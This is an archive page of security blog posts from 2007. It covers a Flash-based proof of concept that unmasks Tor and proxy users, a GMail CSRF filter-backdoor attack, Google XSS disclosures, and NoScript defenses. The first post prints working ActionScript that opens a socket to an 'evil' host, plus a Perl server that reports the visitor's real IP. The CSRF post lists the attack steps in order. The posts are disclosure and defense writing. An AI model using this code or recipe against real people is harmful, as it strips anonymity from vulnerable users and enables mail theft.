Archive for September, 2007

It’s really time to sleep in my timezone, but I just couldn’t resist when I read latest RSnake’s post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing better than some scary demos to convert the non believers.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect , and it apparently works on Gecko-based browser with Java™ installed only. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and I put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser, like Internet Explorer, supporting the Flash player (no need for JavaScript, either).
The

XMLSocket

ActionScript object is used to bypass browser’s proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client’s IP.

Here’s the ActionScript code:

  1. var socket = new XMLSocket();
  2. socket.onConnect = function(success) {
  3. socket.onXML = function(doc) {
  4. getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
  5. doc.firstChild.firstChild.nodeValue);
  6. socket.close();
  7. };
  8. socket.send(new XML());
  9. };
  10. socket.connect("evil.hackademix.net", 9999);

And here’s the Perl server:

  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket;
  4.  
  5. my $port = shift || 9999;
  6. my $sock = new IO::Socket::INET(
  7. LocalPort => $port,
  8. Proto => ‘tcp’,
  9. Listen => SOMAXCONN,
  10. Reuse => 1);
  11. $sock or die "socket: $!";
  12. my($new_sock, $c_addr, $buf);
  13. while (($new_sock, $c_addr) = $sock->accept())
  14. {
  15. my ($client_port, $client_ip) = sockaddr_in($c_addr);
  16. print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
  17. $new_sock->close();
  18. }

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this works also in browsers, like IE, not supporting LiveConnect.
The lesson above obviously applies, even stronger.

Demos

Evil GMail by GoogHOleIf the GoogHOle wasn’t wide enough, yesterday Petko D. Petkov AKA pdp posted another “semi-disclosure” about how you can redirect someone else’s GMail incoming messages to your account.
Petko declared “I am not planning to release this vulnerability for now”, but this counts as a full disclosure in my book, since the details he gives away are far more than enough to put up a proof of concept in 10 minutes, if the reader knowns the very basics of Cross Site Request Forgery (CSRF).

  1. Victim must be logged in GMail.
  2. Victim must visit a malicious web page: most likely scenarios are clicking an external link from an incoming message or surfing porn while checking email from time to time.
  3. The malicious web site forges a POST request to GMail’s “Create Filter” wizard, possibly using an autosubmit invisible form to build a filter which forwards incoming messages to a mail recipient owned by the attacker.
  4. Since user is already authenticated, her session cookie is passed along with the forged request and the GMail filter gets silently implanted, with all the output hidden inside an IFRAME.
  5. The new GMail filter now acts as a persistent backdoor stealing incoming messages, and it will go unnoticed forever unless the victim is a power GMail user who creates or edits from time to time her own filters, which are deep buried in the “Settings” user interface: I, for instance, never saw them until yesterday!

Very clever and very dangerous.
As I said, this surely counts as a 0day public full disclosure: no matter if pdp omitted an explicit PoC. How many of us, having minimal web coding experience, wouldn’t be able to build a working exploit using the info above?

CSRF Countermeasures

As usual, now that’s been publicly disclosed, this vulnerability is being patched very quickly by the great Google development crew.
Nonetheless, many other holes of this kind are still around. That’s why CSRF is called “The Sleeping Giant”: some web coders may still need to learn how to fix or prevent them, and users surely want to know how to protect themselves.

1. Web Developers

Please use form keys!

  1. Generate a random identifier (form key) every time you display a form meant to be submitted by authenticated users only.
  2. Echo your key as an hidden field of the form and bind its value to the user session data kept on the server side.
  3. As soon the form is submitted, compare the returned key with the one stored in session data: if they don’t match, throw away the request because it is probably forged.

The above is a simple yet effective anti-CSRF technique. It will work fine unless a further Cross Site Scripting (XSS) vulnerability is present too, allowing attacker to read your form key on the fly and forge a seemingly valid requests.

2. Web Users

This GMail incident proves how even the best trained web developer in the world can fail at implementing CSRF countermeasures.
Most of the existing literature about XSS and CSRF will tell you that poor users can do nothing to protect themselves from these attacks, but this is blatantly false.
A quite radical, not very usable but effective approach would be using different browsers (or different profiles, if you use Mozilla derivatives) for each “sensitive” web site you access, and force yourself not to follow any external link nor browse any other site while logged in.

Anyway, if you prefer not to make your life miserable by spawning multiple browsers and scanning every single link with a magnifying lens, your answer is, once again, Firefox + NoScript (sorry to sound repetitive, but that’s it).

First of all, automating a POST request is trivial if JavaScript is enabled on the attacker site —

form.submit()

— but just impossible if malicious scripts are blocked by NoScript.
The obvious objection, raised for instance by both pdp and Adrian Pastor at GNUCITIZEN, sounds like:

The attacker could simply build an invisible POST form and disguise its “submit” button as a regular link or an image, then social-engineer his victim into clicking it and so have the exploit launched no matter if JavaScript is disabled.

True, but NoScript effectively defeats this attack as well!

A common misconception about NoScript is that it just blocks JavaScript on untrusted sites.
It certainly does, but NoScript actually enhances browser security in several other ways.
A very incomplete list:

  1. It blocks Java, Flash, Silverlight and other plugins on untrusted sites, and optionally also on trusted pages, while letting you activate the plugin content on demand, with a click.
  2. It prevents malformed URIs to exploit buggy URI handlers, i.e. the foundation for many cross-application exploits discovered by Billy Rios, Nate McFeters and Thor Larholm.
  3. It implements the most advanced and effective anti-XSS protection available on the client side.

NoScript’s anti-XSS protection deploys various specific countermeasures, e.g. HTML/JavaScript injection detection, URL sanitization on suspicious cross-site requests, UTF-7 encoding neutralization and many others.
One of them also provides an effective defense from CSRFs of the kind affecting GMail: in facts, NoScript intercepts POST requests sent from untrusted origins to trusted sites and strips out their payloads.
This means that, even if the attacker exploits a scriptless vector to launch his POST CSRF through social engineering, NoScript users are still safe as long as the malicious site is not explicitly whitelisted.

When he learned this, pdp commented:

Giorgio, sounds good, but doesn’t that break things?
I mean, CSRF is one of the most fundamental Web characteristic.
Disabling it might be OK for people like us, but for the general population, that is a no go!

Petko, my friend,

  1. The very foundation of the Web is CSR (Cross Site Requests, AKA Hyperlinking), not CSRF (Cross Site Request Forgery) which is an unwanted side effect of bad coding practices.
  2. RFC 2616 defining HTTP (hence, in a certain sense, the Web itself), clearly states that while GET requests (the ones we generate by following hyperlinks or submitting a search form) are idempotent, i.e. should not modify the receiving system, POST is reserved to requests which cause a permanent change. NoScript just prevents untrusted sites from modifying data held by trusted sites, and this looks Pure Good™: why could you want the contrary?
  3. Even if you actually wanted the contrary, you can either use the “Unsafe reload” command, available whenever a request is filtered by NoScript, or permanently configure some sites of your choice as unfiltered recipients of unsafe requests by listing them in NoScript Options/Advanced/XSS/Exceptions

The NoScript feature we’re talking about has been in place for more than six month now.
I guess it’s transparent enough if security researchers like you, Adrian or .mario — people “like us”, much more attentive to what happens inside their browsers than “the general population” — did not even notice it… ;)

Not a great month for Google security.
In the past 3 days, 34 interesting disclosures have been published:

  1. Google Search Appliance XSS discovered by MustLive, affecting almost 200,000 paying customers of the outsourced search engine and their users: this Google dork shown 196,000 results at the time of disclosure, now dropped to 188,000. Fear effect?
  2. Billy Rios and Nate McFeters revealed the gory details of their already announced Picasa exploit, leveraging a clever combo of XSS, Cross Application Request Forgery, Flash same domain policy elusion and URI handler weakness exploitation to steal your private pictures, straight from your local hard disk, just visiting a malicious web page.
  3. Finally, the most simple yet impressive, because of the huge number of users involved: beford decided to launch his new blog disclosing a Google Polls XSS which, thanks to the (too) smart “widget reuse” allowing Google services to integrate the same functionality across multiple services, can be used to attack Search, Blogspot, Groups and, the most dramatic exploitation scenario, GMail:

    For such an attack to be successful, the victim just needs to visit a malicious website while logged in Google, e.g. by following a link from an incoming message (unless she’s got anti-XSS protection).

  4. update — a few hours after I released the first version of article, I heard of another Google-outsourced vulnerability, an Urchin Login XSS disclosed by GNUCITIZEN’s Adrian Pastor, which could compromise local Google Analytics installations. Its severity may vary depending on how Urchin is installed (e.g. on a domain different than your main site), but the provided proof of concept is quite interesting because it shows an actual credential theft in action, rather than the usual, boring
    alert(’XSS’)

    . Not that a more spectacular example proves anything new about the dangers of XSS, but some people just don’t believe until they can see with their own eyes.

These vulnerabilities are surely being fixed at top speed, since Google is one of the most reactive organizations in this fight, but they’re nonetheless disturbing because they hit the very main player on the field, with the largest user base on the web: this make this kind of incidents unavoidable ipso facto.
How many vulnerabilities like those just go undisclosed and unpatched, but yet exploited by unethical hacrackers?
In Gareth Heyes‘ words,

This proves everything is insecure, there are just degrees of insecurity.

Talking about XSS, if you’re an end user and you don’t like to stay at the very bottom of the insecurity food chain, you’d better use Firefox with NoScript — but that’s your choice, of course. ;)

I’ve just read on RSnake’s blog that MustLive, a very active the Ukrainian researcher, disclosed yet another XSS vulnerability affecting the Google Search Appliance.

The Google Search Appliance starts at $30,000, whereas the Mini starts at $1,995.

This means that about 196.000 web sites, many of them belonging to very important Universities and other public bodies, are willing to pay for putting their data and their users at risk.

Last time I checked, putting up a self-hosted search engine was not a terribly hard task, no matter if you prefer Java, PHP or just plain CGI.
When you discover your own web site is broken, do you really want to depend on someone else for a fix?

Recent explosions of Petko D. Petkov (pdp)’s pwning lust should teach us a lesson: documents should be documents, not programs!

We’ve seen MP3 tunes pwning Firefox (and NoScript promptly counter-pwning), Windows playlists pwning browser security, and finally PDF documents pwning Windows PCs.
This latest “disclosure” sounds like a strange case of pwnatio precox, since Petko didn’t bother to reveal any detail about the flaw. All he said is

Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

I’ve got no problem with believing his words, since the stuff we keep calling “documents” became containers for all kinds of executable code long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to an overly complex format driven by creeping featurism).

I (like many people, I guess) do have problems with his suggested work-around:

My advise for you is not to open any PDF files (locally or remotely).

This is something no business can afford, plain and simple.
The real fix would be vendors stopping with these crazy mixes of data and code, but it’s something they seem not even considering.
So, how can we mitigate risks of this kind, which surely won’t go away even when Adobe will fix this specific PDF issue?

OK, I’m obviously biased here, but did you ever notice the

NoScript Options/Advanced/Plugins

panel?
NoScript content blocking options
It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins such as Acrobat Viewer, Windows Media Player and QuickTime, just to name the ones featured in pdp’s researches.
If you check all the

Forbid…

checkboxes but the last (IFRAMES), all types of plugin-handled, potentially dangerous content will be blocked by default if coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: you just click it, and you activate the content on the fly if you deem it’s trustworthy.
If you’re a paranoid like me, you may want to trade some usability for maximum security and check also the

Apply these restrictions to trusted sites too

option, which will mandate on-demand activation everywhere.

I heard someone saying

security × usability = K

.
If it’s true (and I hope some day it won’t necessarily be), NoScript tries hard to pump that

K

as much high as it can be.

Bad Behavior has blocked 3098 access attempts in the last 7 days.